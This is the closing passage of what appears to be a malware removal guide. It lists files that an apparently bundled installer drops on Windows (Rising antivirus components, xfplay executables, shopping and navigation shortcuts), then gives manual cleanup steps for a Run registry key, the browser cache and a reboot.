%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\打折网购.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\All Users\Desktop\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\网址导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)
%Program Files%\xfplay\tools.exe (1530 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.